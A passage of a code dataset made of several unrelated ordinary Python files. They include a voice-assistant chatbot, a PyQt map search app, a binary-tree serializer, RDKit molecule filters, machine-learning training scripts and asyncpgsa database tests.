text='Enter a new tag here:', width=150)\n self.entry_box = Entry(self.dialog)\n self.entry_box.insert(0, self.tag)\n button_box = Frame(self.dialog)\n OK = Button(button_box, text='OK', command=self.updateButton)\n OK.bind(\"\", self.update)\n CANCEL = Button(button_box, text='Cancel', command=self.dialog.destroy)\n DELETE = Button(button_box, text='Delete', command=self.delete)\n message.pack(side=TOP)\n self.entry_box.pack(side=TOP)\n OK.pack(side=LEFT)\n CANCEL.pack(side=LEFT)\n DELETE.pack(side=LEFT)\n button_box.pack(side=TOP)\n \n def updateButton(self):\n self.tag = self.entry_box.get()\n coords = self.grid_info()\n self.dialog.destroy()\n self.dialog = None\n self.config(text=self.tag)\n self.grid(row=coords[\"row\"], column=coords[\"column\"], sticky=EW)\n \n def delete(self):\n delete = messagebox.askyesno(title='Delete?', message='Are you sure you want to delete this tag?')\n self.dialog.destroy()\n self.dialog = None\n if delete:\n self.destroy()\n if type(self.controller) is TagsCanvas:\n self.controller.deleteTag(self.tag)\n \n def makeInvisible(self):\n self.grid_forget()\n \n def __str__(self):\n return self.tag\n \n def getTag(self):\n return self.tag","repo_name":"kozmik-moore/Journal-0.3","sub_path":"TagsCanvas.py","file_name":"TagsCanvas.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1924494576","text":"## Title: Hope_female.py\n## Name : \n## @author : Rahul Manna\n## Created on : 2020-05-18 12:18:49\n## Description : \n\nimport os\nimport sys\nimport time\nimport tflite_runtime.interpreter as tflite\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer\nfrom modules.user_info_management import reset_data\nfrom modules.conversation import speech_text, text_speech\nfrom num2words import num2words\nimport numpy as np\nimport json\nimport pickle\nimport random\nimport datetime\nfrom datetime import date\n#import object_finder\n\nUSER_DIRECTORY = \"user\"\n\n#Greetings at begining\ndef greetMe():\n msg = []\n curr_hour = int(datetime.datetime.now().hour)\n if curr_hour >= 0 and curr_hour < 12:\n #msg = \"Good Morning\"\n msg.append(263)\n elif curr_hour >= 12 and curr_hour < 18:\n #msg = \"Good Afternoon\"\n msg.append(264)\n elif curr_hour >= 18 and curr_hour > 0:\n #msg = \"Good Evening\"\n msg.append(265)\n \n return msg\n\ndef run():\n s_t = speech_text()\n t_s = text_speech()\n\n date_today = date.today()\n\n stemmer = PorterStemmer()\n\n reply = []\n\n #Objects to be found\n objects = {\"toothbrush\": 291 ,\"tooth brush\": 292 ,\"hair dryer\": 293 ,\"teddy bear\": 294 ,\"scissors\": 295 ,\"vase\": 296 ,\n \"clock\": 297 ,\"book\": 298 ,\"cell phone\": 299 ,\"mobile\": 300 ,\"remote\": 301 ,\"controller\": 302 ,\"mouse\": 303 ,\n \"potted plant\": 304 ,\"cake\": 305 ,\"donut\": 306 ,\"pizza\": 307 ,\"carrot\": 308 ,\"broccoli\": 309 ,\"orange\": 310 ,\n \"sandwitch\": 311 ,\"apple\": 312 ,\"banana\": 313 ,\"bowl\": 314 ,\"spoon\": 315 ,\"fork\": 316 ,\"knife\": 317 ,\"bottle\": 318 ,\n \"cup\": 319 ,\"tie\": 320 ,\"handbag\": 321 ,\"umbrella\": 322 ,\"backpack\": 323 ,\"car\": 324}\n\n try:\n with open(\"data/response.json\") as file:\n data = json.load(file)\n print(\"[INFO] Response file found.\")\n\n with open(\"data/data.pickle\", \"rb\") as f:\n words,labels,feature,output = pickle.load(f)\n print(\"[INFO] Data file found.\\n------Loading...\")\n except:\n print(\"[INFO] Some data files are missing.\\n[ALERT] Aborting...\")\n #t_s.speak_now(\"Fatal error, data files are not found. Aborting system...\")\n t_s.speak_female([325])\n print(\"[INFO] Please make sure both 'data.pickle' and 'response.json' are present in the folder 'data'\")\n sys.exit()\n\n try:\n interpreter = tflite.Interpreter(model_path=\"tflite_model/model.tflite\")\n except:\n print(\"[INFO] Model not found.\\n[ALERT] Aborting...\")\n #t_s.speak_now(\"Fatal error, Model not found. Aborting system...\")\n t_s.speak_female([326])\n print(\"[INFO] Please make sure 'model.tflite' is present in the folder 'tflite_model'\")\n sys.exit()\n\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n floating_model = input_details[0]['dtype'] == np.float32\n\n #Answer when confidence score is very less\n #no_answer = [\"I do not have an answer for this.\", \"I never thought that way.\", \"I never heard the words you said, please ask a different question.\"]\n no_answer = [288,289,290]\n\n print(\"before\")\n\n #Make 'user' directory if not exists\n if not os.path.exists(f'{USER_DIRECTORY}'):\n os.mkdir(f'{USER_DIRECTORY}')\n\n #Initial greeting\n msg_list = greetMe()\n t_s.speak_female(msg_list)\n #time.sleep(0.3)\n t_s.speak_female([285]) #How can I help you?\n\n #Conversation\n while True:\n reply = []\n print(\"listening...\")\n msg = s_t.listen(isFemale=True) # Get voice command from user\n query = msg[:] # Copy the command\n print(\"User : \",msg)\n\n if 'reset' in msg.split() or 'delete' in msg.split() or 'erase' in msg.split():\n reset_data(isFemale=True)\n msg = s_t.listen() # Get voice command from user\n query = msg[:] # Copy the command\n print(\"User : \",msg)\n\n msg = word_tokenize(msg)\n msg = [stemmer.stem(w.lower()) for w in msg if w!='?']\n\n bag = [0 for _ in range(len(words))]\n\n for i, wrd in enumerate(words):\n if wrd in msg:\n bag[i] = 1\n\n input_data = np.array(bag)\n\n if floating_model:\n input_data = np.float32(input_data)\n\n interpreter.set_tensor(input_details[0]['index'],[input_data]) #Feeding input to the model\n interpreter.invoke()\n\n output_data = interpreter.get_tensor(output_details[0]['index'])\n\n results = np.squeeze(output_data)\n max_confidence_idx = np.argmax(results) #Output from model\n res_label = labels[max_confidence_idx]\n #print(labels[max_confidence_idx])\n\n # Found a desirable output label\n if results[max_confidence_idx] > 0.85:\n reply = []\n for intent in data:\n if intent[\"tag\"] == res_label:\n if res_label == \"date\":\n #reply = str(random.choice(intent[\"responses\"])).format(date_today.strftime(\"%d %B %Y\"))\n reply.append(random.choice(intent[\"response_id\"]))\n dt = date_today.strftime(\"%d %B %Y\")\n d,m,y = dt.split()\n t_s.speak_female(reply)\n reply[0] = num2words(int(d),to='ordinal')\n reply.append(\"of\")\n #t_s.speak_female(reply,isFast=True)\n reply.append(m)\n reply.append(y)\n t_s.speak_female(reply,isFast=True)\n elif res_label == \"year\":\n #reply = str(random.choice(intent[\"responses\"])).format(date_today.year)\n reply.append(random.choice(intent[\"response_id\"]))\n yr = date_today.year\n reply.append(yr)\n t_s.speak_female(reply,isFast=True)\n elif res_label == \"day\":\n #reply = str(random.choice(intent[\"responses\"])).format(date_today.strftime(\"%A\"))\n reply.append(random.choice(intent[\"response_id\"]))\n dt = date_today.strftime(\"%A\")\n reply.append(dt)\n t_s.speak_female(reply,isFast=True)\n elif res_label == \"time\":\n time_now = datetime.datetime.now().strftime(\"%I %M %p\")\n #reply = str(random.choice(intent[\"responses\"])).format(time_now.strftime(\"%I:%M %p\"))\n reply.append(random.choice(intent[\"response_id\"]))\n h,m,mer = time_now.split()\n if h!=0: reply.append(int(h))\n else: reply.append(12)\n if m!=0: reply.append(int(m))\n reply.append(mer)\n t_s.speak_female(reply,isFast=True) \n else:\n #reply = random.choice(intent[\"responses\"])\n reply.append(random.choice(intent[\"response_id\"]))\n t_s.speak_female(reply)\n print(intent[\"tag\"],reply,type(reply[0]))\n break\n\n print(\"Bot : \",reply,results[max_confidence_idx])\n \n if res_label == \"search\":\n reply = []\n obj = \"\"\n obj_id = -1\n for x in objects.keys():\n if x in query:\n obj = x[:]\n obj_id = objects[x]\n break\n if obj == \"\":\n reply.append(286)\n t_s.speak_female(reply)\n #t_s.speak_now(\"Sorry! I do not recognise the object you asked for...\")\n print(\"Bot : Sorry! I do not recognise the object you asked for...\")\n else:\n #Found the name of the object\n #Iintiating object detection algorithm\n #os.system('python3 TFLite_detection_webcam.py --object_to_found='+obj)\n ####object_finder.finder(obj)\n #t_s.speak_now(\"Here is your \"+obj) #Returned the object to the user\n reply.append(287)\n reply.append(obj_id)\n t_s.speak_female(reply,isFast=True)\n \n elif res_label == \"goodbye\": # Quit Bot\n break\n else: # Cound not find a desirable output\n reply = []\n #reply = random.choice(no_answer)\n reply.append(random.choice(no_answer))\n t_s.speak_female(reply)\n #t_s.speak_now(reply)\n print(\"Bot : \", reply, results[max_confidence_idx])\n","repo_name":"imrk97/final_year_project","sub_path":"final_project/Hope_female.py","file_name":"Hope_female.py","file_ext":"py","file_size_in_byte":9103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5084356833","text":"\nimport folium\nimport sys\nimport io\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView \nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QPushButton, QToolButton\nfrom GeoSearch import GeoSearcher\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUi()\n\n\n def initUi(self):\n self.main_ui = uic.loadUi('interface-v0.2.ui')\n self.settings_ui = uic.loadUi('settings.ui')\n\n self.main_ui.searchButton.clicked.connect(self.search_button_clicked)\n\n self.load_map(-5.888947323651743, -35.21097641464734)\n self.geocoord = GeoSearcher()\n\n self.main_ui.show()\n\n\n def search_button_clicked(self):\n address = self.main_ui.addressTextEdit.toPlainText()\n print(address)\n lat, lon = self.geocoord.find(address=address)\n print(lat, lon)\n self.load_map(lat, lon)\n\n \n def load_map(self, lat, lon, zoom=15):\n m = folium.Map(tiles='Stamen Terrain', zoom_start=zoom, location=(lat, lon))\n data = io.BytesIO()\n m.save(data, close_file=False)\n self.main_ui.mapWidget.setHtml(data.getvalue().decode())\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n window = Ui()\n sys.exit(app.exec())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"jpfcabral/map-search-app","sub_path":"MySearchApp.py","file_name":"MySearchApp.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21451963155","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root:\n return \"\"\n nodes = []\n q = [root]\n while q:\n node = q.pop(0)\n if node:\n nodes.append(node.val)\n q.append(node.left)\n q.append(node.right)\n else:\n nodes.append('X')\n return \",\".join(str(c) for c in nodes)\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n if not data:\n return None\n data = data.split(\",\")\n root = TreeNode(data[0])\n q = [root]\n idx = 1\n while idx < len(data):\n node = q.pop(0)\n if data[idx] != 'X':\n left_node = TreeNode(data[idx])\n node.left = left_node\n q.append(left_node)\n idx += 1\n if data[idx] != 'X':\n right_node = TreeNode(data[idx])\n node.right = right_node\n q.append(right_node)\n idx += 1\n return root\n\n \n\n \n\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# ans = deser.deserialize(ser.serialize(root))","repo_name":"jerrt2003/leetcode-in-python","sub_path":"297_Serialize_and_Deserialize_Binary_Tree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12548563491","text":"import simpy\n\nfrom src.utils.debug import *\nfrom src.sys import (\n node,\n task as task_module,\n)\n\n\nclass Server(node.Node):\n def __init__(\n self,\n env: simpy.Environment,\n _id: str,\n sink: node.Node = None,\n ):\n super().__init__(env=env, _id=_id)\n self.sink = sink\n\n self.task_in_serv = None\n self.serv_start_time = None\n self.task_store = simpy.Store(env)\n self.recv_tasks_proc = env.process(self.recv_tasks())\n\n def __repr__(self):\n # return (\n # \"Server( \\n\"\n # f\"{super().__repr__()} \\n\"\n # \")\"\n # )\n\n return f\"Server(id= {self._id})\"\n\n def repr_w_state(self):\n return (\n \"Server( \\n\"\n f\"\\t num_tasks_left= {self.num_tasks_left()} \\n\"\n f\"\\t work_left= {self.work_left()} \\n\"\n \")\"\n )\n\n def num_tasks_left(self) -> int:\n return len(self.task_store.items) + int(self.task_in_serv is not None)\n\n def work_left(self) -> float:\n remaining_serv_time = 0\n if self.task_in_serv:\n remaining_serv_time = self.task_in_serv.service_time - (self.env.now - self.serv_start_time)\n\n return remaining_serv_time + sum(task.service_time for task in self.task_store.items)\n\n def put(self, task: task_module.Task):\n slog(DEBUG, self.env, self, \"recved\", task=task)\n\n task.node_id = self._id\n self.task_store.put(task)\n\n def recv_tasks(self):\n slog(DEBUG, self.env, self, \"started\")\n\n num_tasks_proced = 0\n while True:\n self.task_in_serv = yield self.task_store.get()\n self.serv_start_time = self.env.now\n yield self.env.timeout(self.task_in_serv.service_time)\n\n num_tasks_proced += 1\n slog(DEBUG, self.env, self,\n \"processed\",\n task_in_serv=self.task_in_serv,\n num_tasks_proced=num_tasks_proced,\n queue_len=len(self.task_store.items),\n )\n\n self.sink.put(self.task_in_serv)\n self.task_in_serv = None\n\n slog(DEBUG, self.env, self, \"done\")\n","repo_name":"mfatihaktas/load-balancing-w-thompson-sampling","sub_path":"src/sys/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72524118567","text":"#ARMA\nmodel = ARMA(earthquake, order=(3,1))\nresults = model.fit()\nprint(results.summary())\n#ARMAX\n# Instantiate the model\nmodel = ARMA(hospital['wait_times_hrs'], order=(2,1), \n exog=hospital['nurse_count'])\nresults = model.fit()\n# Print model fit summary\nprint(results.summary())\n\n# Generate predictions\none_step_forecast = results.get_prediction(start=-30)\n# Extract prediction mean\nmean_forecast = one_step_forecast.predicted_mean\n# Get confidence intervals of predictions\nconfidence_intervals = one_step_forecast.conf_int()\n# Select lower and upper confidence limits\nlower_limits = confidence_intervals.loc[:,'lower close']\nupper_limits = confidence_intervals.loc[:,'upper close']\n# Print best estimate predictions\nprint(mean_forecast)\n\n# plot the amazon data\nplt.plot(amazon.index, amazon, label='observed')\n\n# plot your mean predictions\nplt.plot(mean_forecast.index, mean_forecast, color='r', label='forecast')\n\n# shade the area between your confidence limits\nplt.fill_between(lower_limits.index, lower_limits, \n upper_limits, color='pink')\n\n# set labels, legends and show plot\nplt.xlabel('Date')\nplt.ylabel('Amazon Stock Price - Close USD')\nplt.legend()\nplt.show()\n\n#SAME BUT DYNAMIC, NOT 1 STEP\n# Generate Dynamic predictions\ndynamic_forecast = results.get_prediction(start=-30, dynamic=True)\n\n# Extract prediction mean\nmean_forecast = dynamic_forecast.predicted_mean\n\n# Get confidence intervals of predictions\nconfidence_intervals = dynamic_forecast.conf_int()\n\n# Select lower and upper confidence limits\nlower_limits = confidence_intervals.loc[:,'lower close']\nupper_limits = confidence_intervals.loc[:,'upper close']\n\n# Print best estimate predictions\nprint(mean_forecast)\n\n#SAME BUT WITH SARIMAX\n# Create ARIMA(2,1,2) model\narima = SARIMAX(amazon, order=(2,1,2))\narima_results = arima.fit()\narima_value_forecast = arima_results.get_forecast(steps=10).predicted_mean\nprint(arima_value_forecast)","repo_name":"AntonYurievNikolov/PythonTests","sub_path":"ARIMA/Fitting ARMA models.py","file_name":"Fitting ARMA models.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14007721778","text":"from typing import Callable\n\nfrom rdkit.Chem import AllChem, Crippen, Lipinski, Mol, rdMolDescriptors\nfrom rdkit.DataStructs import TanimotoSimilarity\nfrom rdkit.DataStructs.cDataStructs import UIntSparseIntVect\n\nfrom mol_gen.exceptions import FilterException, UndesirableMolecule\n\nDESCRIPTOR_TO_FUNCTION: dict[str, Callable[[Mol], int | float]] = {\n \"hydrogen_bond_acceptors\": Lipinski.NumHAcceptors,\n \"hydrogen_bond_donors\": Lipinski.NumHDonors,\n \"molar_refractivity\": Crippen.MolMR,\n \"molecular_weight\": rdMolDescriptors.CalcExactMolWt,\n \"partition_coefficient\": Crippen.MolLogP,\n \"rotatable_bonds\": rdMolDescriptors.CalcNumRotatableBonds,\n \"topological_polar_surface_area\": rdMolDescriptors.CalcTPSA,\n}\n\n\ndef check_only_allowed_elements_present(mol: Mol, allowed_elements: list[str]) -> None:\n \"\"\"Check if the atoms in a molecule only correspond to allowed elements.\n\n Args:\n mol (Mol): Molecule to check.\n allowed_elements (list[str]): Allowed elements.\n\n Raises:\n UndesirableMolecule: If atoms correspond to other elements.\n \"\"\"\n for atom in mol.GetAtoms():\n element = atom.GetSymbol()\n if element not in allowed_elements:\n raise UndesirableMolecule(f\"Element {element} not in allowed_elements.\")\n\n\ndef check_descriptor_within_range(\n mol: Mol,\n descriptor: str,\n min: int | float | None = None,\n max: int | float | None = None,\n) -> None:\n \"\"\"Calculate descriptor of molecule and compare to allowed min and max values.\n\n Implemented descriptor names are defined in DESCRIPTOR_TO_FUNCTION.\n\n Args:\n descriptor (str): Name of descriptor to calculate.\n mol (Mol): Molecule to calculate descriptor with.\n min (int | float | None, optional): Minimum allowed value. Defaults to None.\n max (int | float | None, optional): Maximum allowed value. Defaults to None.\n\n Raises:\n FilterException: If descriptor to calculate is unrecognised.\n UndesirableMolecule: If descriptor is outside the allowed range of values.\n \"\"\"\n try:\n func = DESCRIPTOR_TO_FUNCTION[descriptor]\n except KeyError:\n raise FilterException(f\"Descriptor {descriptor} unrecognised.\")\n\n value = func(mol)\n try:\n check_value_within_range(value, min=min, max=max)\n except UndesirableMolecule as e:\n raise UndesirableMolecule(\n f\"Descriptor {descriptor} out of allowed range of values: {e}\"\n )\n\n\ndef check_value_within_range(\n val: int | float,\n min: int | float | None = None,\n max: int | float | None = None,\n):\n \"\"\"Check if value is within the allowed min and max values.\n\n Args:\n val (int | float): Value to compare.\n min (int | float | None, optional): Minimum allowed value. Defaults to None.\n max (int | float | None, optional): Maximum allowed value. Defaults to None.\n\n Raises:\n UndesirableMolecule: If descriptor is outside the allowed range of values.\n \"\"\"\n if (min is not None) and (min > val):\n raise UndesirableMolecule(f\"Value {val} less than minimum allowed value {min}.\")\n\n if (max is not None) and (max < val):\n raise UndesirableMolecule(\n f\"Value {val} greater than maximum allowed value {max}.\"\n )\n\n\ndef check_tanimoto_score_above_threshold(\n mol: Mol, fingerprint: UIntSparseIntVect, min: int | float\n):\n \"\"\"Compare molecule to Morgan fingerprint by Tanimoto scoring.\n\n Args:\n mol (Mol): Molecule to check.\n fingerprint (UIntSparseIntVect): Morgan fingerprint to compare against.\n min (int | float): Minimum allowed Tanimoto score.\n\n Raises:\n UndesirableMolecule: If Tanimoto score is less than the minimum allowed value.\n \"\"\"\n fp2 = AllChem.GetMorganFingerprint(mol, 2)\n score = TanimotoSimilarity(fingerprint, fp2)\n\n if score < min:\n raise UndesirableMolecule(\n f\"Tanimoto score {score} less than minimum allowed value {min}.\"\n )\n","repo_name":"a-whitehouse/mol-gen","sub_path":"src/mol_gen/preprocessing/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72416356329","text":"import xgboost as xgb\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import confusion_matrix, log_loss\r\nfrom utility import *\r\n\r\ndef final_model(data):\r\n y = data['is_duplicate']\r\n data = data.drop(['is_duplicate'], axis = 1)\r\n\r\n X_train,X_test, y_train, y_test = train_test_split(data, y, stratify = y, test_size=0.3)\r\n\r\n X_train = standardize_data(X_train)\r\n X_test = standardize_data(X_test)\r\n \r\n clf = logistic_regressor(X_train, X_test, y_train, y_test)\r\n\r\n XGboost(X_train, X_test, y_train, y_test, clf)\r\n\r\ndef XGboost(X_train, X_test, y_train, y_test, clf):\r\n print(\"running XGboost Model\") \r\n params = {}\r\n params['objective'] = 'binary:logistic'\r\n params['eval_metric'] = 'logloss'\r\n params['eta'] = 0.02\r\n params['max_depth'] = 4\r\n\r\n d_train = xgb.DMatrix(X_train, label=y_train)\r\n d_test = xgb.DMatrix(X_test, label=y_test)\r\n\r\n watchlist = [(d_train, 'train'), (d_test, 'valid')]\r\n\r\n bst = xgb.train(params, d_train, 400, watchlist, early_stopping_rounds=20, verbose_eval=10)\r\n\r\n xgdmat = xgb.DMatrix(X_train,y_train)\r\n predict_y = bst.predict(d_test)\r\n print(\"The test log loss is:\",log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n\r\n\r\ndef logistic_regressor(X_train, X_test, y_train, y_test):\r\n print(\"running logistic regression Model\")\r\n alpha = [10 ** x for x in range(-5, 2)] # hyperparam for SGD classifier.\r\n\r\n log_error_array=[]\r\n for i in alpha:\r\n clf = SGDClassifier(alpha=i, penalty='l2', loss='log', random_state=42)\r\n clf.fit(X_train, y_train)\r\n sig_clf = CalibratedClassifierCV(clf, method=\"sigmoid\")\r\n sig_clf.fit(X_train, y_train)\r\n predict_y = sig_clf.predict_proba(X_test)\r\n log_error_array.append(log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n print('For values of alpha = ', i, \"The log loss is:\",log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n\r\n\r\n\r\n best_alpha = np.argmin(log_error_array)\r\n clf = SGDClassifier(alpha=alpha[best_alpha], penalty='l2', loss='log', random_state=42)\r\n clf.fit(X_train, y_train)\r\n sig_clf = CalibratedClassifierCV(clf, method=\"sigmoid\")\r\n sig_clf.fit(X_train, y_train)\r\n\r\n predict_y = sig_clf.predict_proba(X_train)\r\n print('For values of best alpha = ', alpha[best_alpha], \"The train log loss is:\",log_loss(y_train, predict_y, labels=clf.classes_, eps=1e-15))\r\n predict_y = sig_clf.predict_proba(X_test)\r\n print('For values of best alpha = ', alpha[best_alpha], \"The test log loss is:\",log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n predicted_y =np.argmax(predict_y,axis=1)\r\n print(\"Total number of data points :\", len(predicted_y))\r\n #plot_confusion_matrix(y_test, predicted_y)\r\n\r\n return clf\r\n# This function plots the confusion matrices given y_i, y_i_hat.\r\ndef plot_confusion_matrix(test_y, predict_y):\r\n C = confusion_matrix(test_y, predict_y)\r\n \r\n plt.figure(figsize=(20,4))\r\n \r\n labels = [1,2]\r\n # representing A in heatmap format\r\n cmap=sns.light_palette(\"blue\")\r\n #plt.subplot(1, 1, 1)\r\n sns.heatmap(C, annot=True, cmap=cmap, fmt=\".3f\", xticklabels=labels, yticklabels=labels)\r\n plt.xlabel('Predicted Class')\r\n plt.ylabel('Original Class')\r\n plt.title(\"Confusion matrix\")\r\n \r\n plt.show()\r\n\r\n","repo_name":"tarangchaturvedi/quora_question_similarity","sub_path":"model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8545265137","text":"import requests\nfrom collections import Counter\n\nSTOCK_DATA = 'https://bites-data.s3.us-east-2.amazonaws.com/stocks.json'\n\n# pre-work: load JSON data into program\n\nwith requests.Session() as s:\n data = s.get(STOCK_DATA).json()\n\ndef _cap_str_to_mln_float(cap):\n \"\"\"If cap = 'n/a' return 0, else:\n - strip off leading '$',\n - if 'M' in cap value, strip it off and return value as float,\n - if 'B', strip it off and multiple by 1,000 and return\n value as float\"\"\"\n cap = cap.lstrip('$')\n if cap == 'n/a':\n return 0\n if 'M' in cap:\n return float(cap.replace('M', ''))\n if 'B' in cap:\n return float(cap.replace('B', '')) * 1000\n\ndef get_industry_cap(industry):\n \"\"\"Return the sum of all cap values for given industry, use\n the _cap_str_to_mln_float to parse the cap values,\n return a float with 2 digit precision\"\"\"\n ret = sum(_cap_str_to_mln_float(line[\"cap\"])\n for line in data if line[\"industry\"] == industry)\n return round(ret, 2)\n\ndef get_stock_symbol_with_highest_cap():\n \"\"\"Return the stock symbol (e.g. PACD) with the highest cap, use\n the _cap_str_to_mln_float to parse the cap values\"\"\"\n stocks_sorted = sorted(data, key=lambda x: _cap_str_to_mln_float(x[\"cap\"]))\n return stocks_sorted[-1]['symbol']\n\ndef get_sectors_with_max_and_min_stocks():\n \"\"\"Return a tuple of the sectors with most and least stocks,\n discard n/a\"\"\"\n cnt = Counter([x[\"sector\"] for x in data\n if x[\"sector\"] != 'n/a']).most_common()\n return cnt[0][0], cnt[-1][0]\n\n # sectors = Counter(k['sector']\n # for k in data\n # if k.get('sector'))\n #\n # minimum = min(sectors, key=sectors.get)\n # maximum = sectors.most_common(2)[-1][0]\n # return (maximum, minimum)\n","repo_name":"SimonSlominski/Pybites_Exercises","sub_path":"Pybites/129/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35151194341","text":"from asyncpgsa import pg\nimport pytest\nimport sqlalchemy as sa\n\nfrom . import HOST, PORT, USER, PASS, DB_NAME\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef init_pg(event_loop):\n \"\"\"\n Initializes the pg connection before each test in the module.\n :param event_loop: Active event loop for the test run\n :return: None\n \"\"\"\n event_loop.run_until_complete(pg.init(\n host=HOST,\n port=PORT,\n database=DB_NAME,\n user=USER,\n # loop=loop,\n password=PASS,\n min_size=1,\n max_size=10\n ))\n\nquery = sa.select('*') \\\n .select_from(sa.text('sqrt(:num) as a')) \\\n .select_from(sa.text('sqrt(:a2) as b')) \\\n .select_from(sa.text('sqrt(:z3) as c')) \\\n .params(num=16, a2=36, z3=25)\n\n\nasync def test_pg_query_async_with_statement():\n ps = pg.query(query)\n async with ps as cursor:\n row = sentinel = object()\n async for row in cursor:\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n if row is sentinel:\n pytest.fail('Cursor had no data')\n\n\nasync def test_pg_query_with_bad_with_statement():\n ps = pg.query(query)\n\n with pytest.raises(RuntimeError) as exc_info:\n with ps as cursor:\n async for row in cursor:\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n result = 2\n\n assert result == 2\n\n assert str(exc_info.value) == 'Must use \"async with\"'\n\n\nasync def test_pg_query_with_no_results():\n ps = pg.query(\"SELECT * FROM pg_tables WHERE tablename='bob'\")\n async with ps as cursor:\n async for row in cursor:\n raise Exception('Should not have hit this line')\n\n\nasync def test_pg_queury_with_await():\n ps = pg.query(query)\n results = await ps\n row = sentinel = object()\n for row in results:\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n if row is sentinel:\n pytest.fail('No results')\n\nasync def test_fetch():\n for row in await pg.fetch(query):\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n assert 1 == 1\n\n\nasync def test_fetch_nonetype():\n query = \"SELECT * FROM pg_tables WHERE tablename='foobar_doesnt_exist'\"\n result = await pg.fetch(query)\n for r in result:\n assert False, 'Should not have any data'\n\n\nasync def test_fetchrow():\n row = await pg.fetchrow(query)\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n\nasync def test_fetchrow_nonetype():\n query = \"SELECT * FROM pg_tables WHERE tablename='foobar_doesnt_exist'\"\n result = await pg.fetchrow(query)\n assert not bool(result)\n\n\nasync def test_fetchrow_sometype():\n result = await pg.fetchrow(query)\n assert bool(result), 'Fetchrow should be truthy with data.'\n\n\nasync def test_execute():\n script = \"SELECT 1; SELECT 2;\"\n result = await pg.execute(script)\n assert bool(result)\n\n\nasync def test_fetchval():\n value = await pg.fetchval(query, column=2)\n assert value == 5.0\n\n value = await pg.fetchval(query, column=0)\n assert value == 4.0\n\n value = await pg.fetchval(query, column=1)\n assert value == 6.0\n\n\nasync def test_sql_with_arguments():\n script = \"SELECT $1::INT\"\n result = await pg.execute(script, 1)\n assert bool(result)\n\n\nasync def test_execute_with_sa_arguments():\n script = sa.select('*').select_from(sa.text('sqrt(:num) as a'))\n script = script.params(num=16)\n result = await pg.execute(script)\n assert bool(result)\n\nasync def test_transaction():\n async with pg.transaction() as conn:\n for row in await conn.fetch(query):\n assert row['a'] == 4.0\n\n\nasync def test_begin():\n async with pg.begin() as conn:\n for row in await conn.fetch(query):\n assert row['a'] == 4.0\n","repo_name":"CanopyTax/asyncpgsa","sub_path":"tests/test_pgsingleton.py","file_name":"test_pgsingleton.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"53"} +{"seq_id":"24869035137","text":"# -*- coding: UTF-8 -*-\n\nimport logging\n\n# Application's version\nversion = \"1.0.0\"\n\n\nclass loggable(object):\n \"\"\"\n Include logger property in objects to handle log messages\n \"\"\"\n\n _logger = None\n\n @property\n def logger(self):\n if self._logger is None:\n logger_name = \"{}.{}\".format(\n self.__class__.__module__,\n self.__class__.__name__)\n\n self._logger = logging.getLogger(logger_name)\n\n return self._logger\n\n @logger.setter\n def logger(self, logger):\n self._logger = logger","repo_name":"alissonperez/TwitterMonitor","sub_path":"twitter_monitor/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"27711181542","text":"import 